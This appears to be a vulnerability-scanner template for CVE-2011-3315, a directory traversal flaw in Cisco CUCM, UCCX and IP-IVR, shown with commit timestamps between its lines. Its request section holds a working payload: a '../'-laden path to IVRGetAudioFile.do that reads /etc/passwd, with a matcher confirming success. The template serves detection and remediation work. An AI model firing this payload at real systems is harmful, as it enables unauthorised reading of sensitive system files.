2021-07-22 23:11:05 +00:00
id : CVE-2011-3315
info :
name : Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
author : daffainfo
severity : high
2022-05-17 09:18:12 +00:00
description : A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to access sensitive files and directories on the affected system.
2023-09-06 13:22:34 +00:00
remediation : Upgrade to the latest version to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/36256
2022-05-17 09:18:12 +00:00
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-02-21 18:33:16 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
2023-07-11 19:49:27 +00:00
cvss-score : 7.8
2022-02-21 18:33:16 +00:00
cve-id : CVE-2011-3315
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2024-03-23 09:28:19 +00:00
epss-score : 0.72021
epss-percentile : 0.97988
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cisco
product : unified_ip_interactive_voice_response
tags : cve,cve2011,lfi,cisco,edb
2021-07-22 23:11:05 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-22 23:11:05 +00:00
- method : GET
path :
- "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-22 23:11:05 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 490a0046304402203755f7c63e99d436630a8407a862c05b9ba15cc8afbe6ff69938ced0202577080220564c8d53df44ef235f4749d857dba8cc0317888378371e240f8aa04dc6b306fb:922c64590222798bb761d5b6d8e72950